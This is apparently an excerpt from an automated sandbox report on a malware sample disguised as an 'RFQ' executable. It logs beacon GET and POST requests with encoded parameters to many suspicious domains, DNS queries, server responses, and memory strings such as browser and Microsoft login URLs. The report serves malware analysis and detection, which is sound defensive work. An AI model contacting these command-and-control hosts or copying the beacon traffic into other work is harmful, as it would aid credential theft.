            Source: global traffic | HTTP traffic detected: GET /2fpq/?Vvn=XtJLE6KXyHJ010P&N0spilI0=Kb/tSpzo2Dwy8QCik2PCr8/dlP2bBJ+jv+ep1kI5jCwuscQQek2bWkoiPh5FTvH+ji2zFJaVeezPpoGajJ7KnUaOWGTJ/qpny8WUA+svitDcwEORStRuN1w= HTTP/1.1 | Host: www.insicilia.today | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010P HTTP/1.1 | Host: www.tempatmudisini01.click | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /xweg/?Vvn=XtJLE6KXyHJ010P&N0spilI0=zyGgAOIUWHAkjy5wbuax0/FfUf3h0NwJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8Y+Ai5wuik0xspH+a6MWSZLxuSkFH9/b6rws= HTTP/1.1 | Host: www.o731lh.vip | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /2ho9/?N0spilI0=sZDoihg8ajsFNu4rJh4aU/u18lT0jTMSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3C72rBIAnGZtnn+XzJEmDgEkU4cQofgEFxbM=&Vvn=XtJLE6KXyHJ010P HTTP/1.1 | Host: www.consultarfacil.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /8o1o/?N0spilI0=QunhVm6kZFQCJjGjii7PtVl4QBOBSEhunS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjW/EB0lpOjo9F2+iOt7QfZRjcLyTCi7EuLmU=&Vvn=XtJLE6KXyHJ010P HTTP/1.1 | Host: www.broomeorchard.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /4est/?N0spilI0=6TioOITzTznuWaHFY2nP+M5OXgMojRQqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXgac9EFud27M13v05UDH3lX7bp5CeFPtRd9M=&Vvn=XtJLE6KXyHJ010P HTTP/1.1 | Host: www.suarahati20.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /8qne/?N0spilI0=KTDLAip6979182Yus4gak8cu0ouPK1SjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdc2yH6m+FOGHStPZpUzCEofUPNgN9qGZfSYG8=&Vvn=XtJLE6KXyHJ010P HTTP/1.1 | Host: www.nmh6.site | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | DNS traffic detected: DNS query: www.whats-in-the-box.org
            Source: global traffic | DNS traffic detected: DNS query: www.1183377.app
            Source: global traffic | DNS traffic detected: DNS query: www.52ywq.vip
            Source: global traffic | DNS traffic detected: DNS query: www.zenscape.top
            Source: global traffic | DNS traffic detected: DNS query: www.asociacia.online
            Source: global traffic | DNS traffic detected: DNS query: www.93187.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.insicilia.today
            Source: global traffic | DNS traffic detected: DNS query: www.tempatmudisini01.click
            Source: global traffic | DNS traffic detected: DNS query: www.o731lh.vip
            Source: global traffic | DNS traffic detected: DNS query: www.consultarfacil.online
            Source: global traffic | DNS traffic detected: DNS query: www.broomeorchard.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.suarahati20.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.nmh6.site
            Source: unknown | HTTP traffic detected: POST /8z5k/ HTTP/1.1 | Host: www.1183377.app | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Accept-Encoding: gzip, deflate, br | Content-Type: application/x-www-form-urlencoded | Cache-Control: no-cache | Connection: close | Content-Length: 205 | Origin: http://www.1183377.app | Referer: http://www.1183377.app/8z5k/ | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 | Data Ascii: N0spilI0=/3ymXrZusQ/tr+43hOZT9Fmh53AdH8mQkdugANIZzXRbJUfUZFlIEKd2aC8hlFB/vSeWcx20XDC6ncpnExaeZxW3gWJqmB6WuOxsr6UUV07kS+VhdZnG1CoB5ParoyxHFMQXNA/jbZxKC9rnPIrj7m5a7gEcEOhu7KnCPJD/ezcCpGoh291ljgfdjBwZI7XnZg==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 03:36:44 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 774 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 03:36:46 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 774 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 03:36:49 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 774 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 25 Sep 2024 03:36:51 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 774 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 03:36:57 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 03:37:00 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 03:37:03 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 03:37:05 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 03:37:11 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66c48d46-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 03:37:14 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66c48d46-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 03:37:17 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66c48d46-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 25 Sep 2024 03:37:19 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66c48d46-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 25 Sep 2024 03:38:37 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 03:38:40 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 03:38:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 03:38:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: write.exe, 00000006.00000002.4162310977.0000000005C52000.00000004.10000000.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000036D2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs
            Source: TNPukQnytLH.exe, 00000007.00000002.4163624707.0000000004C7B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nmh6.site
            Source: TNPukQnytLH.exe, 00000007.00000002.4163624707.0000000004C7B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nmh6.site/8qne/
            Source: write.exe, 00000006.00000002.4162310977.0000000005478000.00000004.10000000.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.0000000002EF8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://6329.vhjhbv.com/4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 00000006.00000002.4162310977.000000000560A000.00000004.10000000.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.000000000308A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: write.exe, 00000006.00000002.4160569986.0000000000923000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: write.exe, 00000006.00000002.4160569986.0000000000923000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 00000006.00000002.4160569986.0000000000923000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 00000006.00000002.4160569986.0000000000923000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033uh)
            Source: write.exe, 00000006.00000002.4160569986.0000000000923000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 00000006.00000002.4160569986.0000000000911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: write.exe, 00000006.00000003.2351219624.00000000079F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
